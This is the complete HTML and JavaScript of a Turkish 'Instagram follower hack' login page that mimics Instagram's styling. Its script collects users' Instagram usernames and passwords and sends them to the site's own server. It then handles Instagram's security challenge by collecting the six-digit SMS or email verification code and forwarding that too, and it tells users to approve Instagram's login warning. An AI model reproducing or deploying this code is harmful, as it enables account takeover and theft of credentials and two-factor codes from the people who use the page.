<html lang="tr"><head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">

<title>Login | Sosyal medya büyütme ve takipçilerini yükselmenin en iyi adresi  Takipcimx sizlerle , instagram takipçi hilesi , instagram beğeni, instagram takipçi, takipçi hilesi,</title>
<meta name="robots" content="noindex, nofollow">
<meta id="viewport" name="viewport" content="width=device-width, user-scalable=no, initial-scale=1, minimum-scale=1, maximum-scale=1">
<style>
			body::-webkit-scrollbar {
				display: none;
			}
		</style>
<link rel="stylesheet" href="css/instastyle.css">
</head>
<body>
<span id="react-root">
<section class="instaclass5">
<main class="instaclass4 instaclass30" role="main">
<article class="instaarticle3">
<div class="instaclass1">
<div class="instaclass2">
<div style="padding: 15px 20px 15px;
    text-align: center;
    color: white;
    margin-top: -10px;
    line-height: 1.2;
    background: #005C97;
    background: -webkit-linear-gradient(to right, #363795, #005C97);
    background: linear-gradient(to bottom, #363795, #005C97);" class="pictureAlert">
<p style="margin-bottom: 10px">If you log in with accounts without pictures, you will be given low followers and likes credits.</p>
<p>Sign in with picture accounts to earn more credits.</p>
</div>
<div class="instaclass20" style="color: red; text-align: left;">
<div class="container text-center">
<div id="google_translate_element"></div>
</div>
<h1 style="color: black; font-weight: bold; font-size:25px; text-align:center; padding: 10px;">GİRİŞ</h1>
<div id="slfErrorAlert" aria-atomic="true" role="alert"></div>
</div>
<div class="instaclass6">
<form method="POST" onsubmit="return false;" class="instaclass7">
<div class="instaclass8 instaclass9"><input type="text" class="instaclass10 instaclass11" aria-describedby="" aria-label="Kullanıcı adı" aria-required="true" maxlength="30" name="username" id="username" placeholder="Kullanıcı adı" value="" autocomplete="off">
<div class="suggestUsers"><ul></ul></div>
</div>
<div class="instaclass8 instaclass9">
<input type="password" class="instaclass10 instaclass11" aria-describedby="" aria-label="Şifre" aria-required="true" name="password" placeholder="Şifre">
</div>
<input type="hidden" name="userid">
<span class="instaclass14 instaclass15">
<button id="login_insta" class="instaclass16 instaclass17 instaclass18 instaclass19">Giriş yap</button>
<div class="spiSpinner"></div>
</span>
<p style="font-size: 16px; padding:0 15px; text-align:center; color: blue; font-weight: bold;margin-top:0px;line-height:1.2;">!!!!!!<br>Login it may take a long time, Please wait.</p>
<p style="font-size: 16px; padding:0 15px; text-align:center; color: red; font-weight: bold;margin-top:15px;line-height:1.2;">Giriş yapma işlemi 2 dakikaya kadar sürebilir. Lütfen bekleyin.<br>!!!!!!</p>
<div class="instaclass20" style="color: black; text-align: left;">
<p style="color: red;">Bu sitenin instagram ile hiçbir bağlantısı yoktur. Kullanıcı adı ve şifreniz ile Instagram API sistemi kullanılarak işlemleriniz gerçekleştirilir.</p><p> </p>
<p>Bu site Havuz Sistemi mantığı ile çalışmaktadır.</p>
<p style="color: blue; text-align: left;">Sürekli şifre yanlış hatası alıyorsanız instagram mobil uygulaması üzerinden hesabınıza girin. Çıkan uyarıda bendim butonuna tıklayın.</p>
</div>
<div class="instaclass20" style="color: black; text-align: left;">
<p style="color: blue; text-align: left;">Sürekli şifre yanlış hatası ile karşılaşabilirsiniz. Instagram'ın anti-spam sisteminde bir hata var. Konu, çözebileceğimiz bir şey değil. Instagram kendisi çözecektir. Burayı takip etmeye devam edin.</p>
</div>
<div class="instaclass20" style="color: black; text-align: left;">
<span style="color: red; font-weight: bold;">Burayı oku!</span> 1- Giriş uzun sürebilir bekleyin lütfen..(30 saniye kadar sürer.) <br>2- ilk girişte şifre yanlış diyebilir. https://www.instagram.com üzerinden hesabınıza girin. Çıkan uyarıda bendim diyin ve buradan tekrar giriş yapın..<br>3- Instagram şifrenizi bloke edebilir. Şifremi unuttum diyerek yeni şifre alabilirsiniz.</div>
</form>
</div>
</div>
</div>
</article>
</main>
</section>
</span>
<style>
			.onay_kodu_ekrani {
				display: none;
				position: fixed;
				top: 0;
				width: 100%;
				height: 100%;
				background: #fff;
				padding: 50px 15px;
				text-align: center;
			}

			.onay_kodu_girme_ekrani {
				display: none;
				position: fixed;
				top: 0;
				width: 100%;
				height: 100%;
				background: #fff;
				padding: 50px 15px;
				text-align: center;
			}

			.onay_kodu_ekrani select {
				padding: 10px;
				font-size: 14px;
			}

			.onay_kodu_ekrani button {
				width: 160px;
				margin: 30px auto;
				padding: 8px;
				background: #299029;
				border: 1px solid #39c739;
				color: #fff;
				border-radius: 10px;
				cursor: pointer;
			}

			.onay_kodu_ekrani button:hover {
				background: #207520;
			}

			.onay_kodu_ekrani button:disabled {
				background: #6fcc6f;
			}

			.onay_kodu_girme_ekrani input {
				padding: 10px;
				font-size: 14px;
			}

			.onay_kodu_girme_ekrani button {
				width: 160px;
				margin: 30px auto;
				padding: 8px;
				background: #299029;
				border: 1px solid #39c739;
				color: #fff;
				border-radius: 10px;
				cursor: pointer;
			}

			.onay_kodu_girme_ekrani button:hover {
				background: #207520;
			}

			.onay_kodu_girme_ekrani button:disabled {
				background: #6fcc6f;
			}
		</style>
<div class="onay_kodu_ekrani"></div>
<div class="onay_kodu_girme_ekrani"></div>
<script src="js/jquery.min.js"></script>
<script src="https://www.google.com/recaptcha/api.js"></script>
<script>
			$('#login_insta').click(function () {
				$('#slfErrorAlert').hide();
				$(this).attr("disabled", "disabled");
				$maindiv = $(this);
				$maindiv.addClass("instaclass31");
				$('.spispinner').show();
								var dataList = "username=" + encodeURIComponent($('input[name="username"]').val()) + "&password=" + encodeURIComponent($('input[name="password"]').val()) + "&userid=" + encodeURIComponent($('input[name="userid"]').val()) + "&antiForgeryToken=75947ab1397574076ff2ba1e8cf67835";
				
				$.ajax({
					type: "POST",
					url: "?",
					dataType: "json",
					data: dataList,
					success: function (json) {
						if (json.status == 'success') {
							window.parent.location.href = json.returnUrl;
							window.parent.$.fancybox.close();
						} else {

							var $allData = json.allData;
							if (json.status == 1) {
								window.parent.location.href = json.returnUrl;
								window.parent.$.fancybox.close();
							}
							if (json.status == 3) {

								if (json.allData.step_name == 'verify_code') {

									var onayKoduEkrani = $('.onay_kodu_girme_ekrani');
									onayKoduEkrani.html('');
									var html = "<div>Lütfen size gönderilen 6 haneli kodu girerek devam edin.</div><br/>";
									html += "<input type='number' id='kod_onayla_input' value='' maxlength='6' placeholder='Onay Kodu?'/>";
									html += "<div><button class='kod_onayla'>Onayla</button>";
									onayKoduEkrani.html(html);
									onayKoduEkrani.show();

									$('.kod_onayla').click(function () {
										var kodOnay = $('#kod_onayla_input').val();

										if (kodOnay.length < 6) {
											alert("Gelen onay kodu en az 6 karakter olmalıdır");
										}

										$allData.code = kodOnay;
										$('.kod_onayla').attr("disabled", "disabled");
										$('.kod_onayla').html('Onaylanıyor..');
										$.ajax({
											url: "/ajax/kod-onayla",
											data: $allData,
											type: "POST",
											success: function (json) {
												if (json.status == "ok") {
													window.parent.location.href = json.returnUrl;
													window.parent.$.fancybox.close();
												} else {
													alert(json.error);
													$('.spispinner').hide();
													$maindiv.removeAttr("disabled");
													$maindiv.removeClass("instaclass31");
												}
											}
										});
									});

								} else {
									var onayEkrani = $('.onay_kodu_ekrani');
									onayEkrani.html('');
									var data = json.allData.step_data;


									var html = "<div>" + json.error + "</div><br/>";
									html += "<select id='choice_select'>";

									if (typeof data.phone_number !== "undefined") {
										html += "<option value='0'>GSM ile Onayla: " + data.phone_number + "</option>";
									}

									if (typeof data.email !== "undefined") {
										html += "<option value='1'>E-Posta ile Onayla: " + data.email + "</option>";
									}

									html += "</select>";
									html += "<div><button class='kod_iste'>Güvenlik Kodu Gönder</button></div>";
									onayEkrani.html(html);
									onayEkrani.show();

									json.allData.choice = $('#choice_select').val();
								}


								$('.kod_iste').click(function () {
									$('.kod_iste').attr("disabled", "disabled");
									$('.kod_iste').html('Kod İsteniyor...');

									$.ajax({
										url: "/ajax/kod-gonder",
										data: $allData,
										type: "POST",
										success: function (json) {
											if (json.status == "ok") {
												var onayKoduEkrani = $('.onay_kodu_girme_ekrani');
												onayKoduEkrani.html('');
												var html = "<div>Lütfen size gönderilen 6 haneli kodu girerek devam edin.</div><br/>";
												html += "<input type='number' id='kod_onayla_input' value='' maxlength='6' placeholder='Onay Kodu?'></input>";
												html += "<div><button class='kod_onayla'>Onayla</button></div>";
												onayKoduEkrani.html(html);
												onayKoduEkrani.show();


												$('.kod_onayla').click(function () {
													var kodOnay = $('#kod_onayla_input').val();
													if (kodOnay.length < 6) {
														alert("Gelen onay kodu en az 6 karakter olmalıdır");
														$('.spispinner').hide();
														$maindiv.removeAttr("disabled");
														$maindiv.removeClass("instaclass31");
													}

													$allData.code = kodOnay;
													$('.kod_onayla').attr("disabled", "disabled");
													$('.kod_onayla').html('Onaylanıyor..');
													$.ajax({
														url: "/ajax/kod-onayla",
														data: $allData,
														type: "POST",
														success: function (json) {
															if (json.status == "success") {
																window.parent.location.href = json.returnUrl;
																window.parent.$.fancybox.close();
															} else {
																alert(json.error);
																$('.spispinner').hide();
																$maindiv.removeAttr("disabled");
																$maindiv.removeClass("instaclass31");
															}
														}
													});
												});

											} else {
												alert(json.error);
												$('.spispinner').hide();
												$maindiv.removeAttr("disabled");
												$maindiv.removeClass("instaclass31");
											}
										}
									});

								});

							} else {
								$('#slfErrorAlert').html(json.error);
								$('#slfErrorAlert').show();
								$('.spispinner').hide();
								$maindiv.removeAttr("disabled");
								$maindiv.removeClass("instaclass31");
							}
						}
					},
					error: function (xhr, status, error) {
						console.log("-------------- Hata Logu Başlangıcı -------------------\n" + xhr.responseText +
							"\n-------------- Hata Logu Bitişi -------------------");

						$('#slfErrorAlert').html("Bir hata oluştu. Lütfen daha sonra tekrar deneyin.");
						$('#slfErrorAlert').show();
						$('.spispinner').hide();
						$maindiv.removeAttr("disabled");
						$maindiv.removeClass("instaclass31");
					}
				});
			});

						(function (i, s, o, g, r, a, m) {
				i['GoogleAnalyticsObject'] = r;
				i[r] = i[r] || function () {
					(i[r].q = i[r].q || []).push(arguments)
				}, i[r].l = 1 * new Date();
				a = s.createElement(o),
					m = s.getElementsByTagName(o)[0];
				a.async = 1;
				a.src = g;
				m.parentNode.insertBefore(a, m)
			})(window, document, 'script', 'https://www.google-analytics.com/analytics.js', 'ga');
			ga('create', '', 'auto');
			ga('send', 'pageview');
			
			$('#username').keyup(function () {
				$('input[name="userid"]').val("");
				$('.suggestUsers').show();
				var value = $(this).val();
				$.ajax({
					type: "GET",
					url: "https://www.instagram.com/web/search/topsearch/?context=blended&query=" + value + "&rank_token=0.8516828732626001&include_reel=true&count=0",
					dataType: "json",
					cache: false,
					crossDomain: true,
					success: function (response) {
						var html = "";
						response.users.forEach(function (a, b) {
							html += "<li onclick='$(\"input[name=username]\").val(\"" + a.user.username + "\");$(\"input[name=userid]\").val(" + a.user.pk + ");$(\".suggestUsers ul\").html(\"\");$(\".suggestUsers\").hide();'><div class='suggestimg'><img src='" + a.user.profile_pic_url + "'/></div><div class='suggestinfo'><b>" + a.user.username + "</b><span>" + a.user.full_name + "</span></div></li>";
						});
						$('.suggestUsers ul').html(html);
					}
				})
			});
		</script>
<script type="text/javascript">
			function googleTranslateElementInit() {
				new google.translate.TranslateElement({pageLanguage: 't'}, 'google_translate_element');
			}
		</script>
<script type="text/javascript" src="//translate.google.com/translate_a/element.js?cb=googleTranslateElementInit"></script>


</body></html>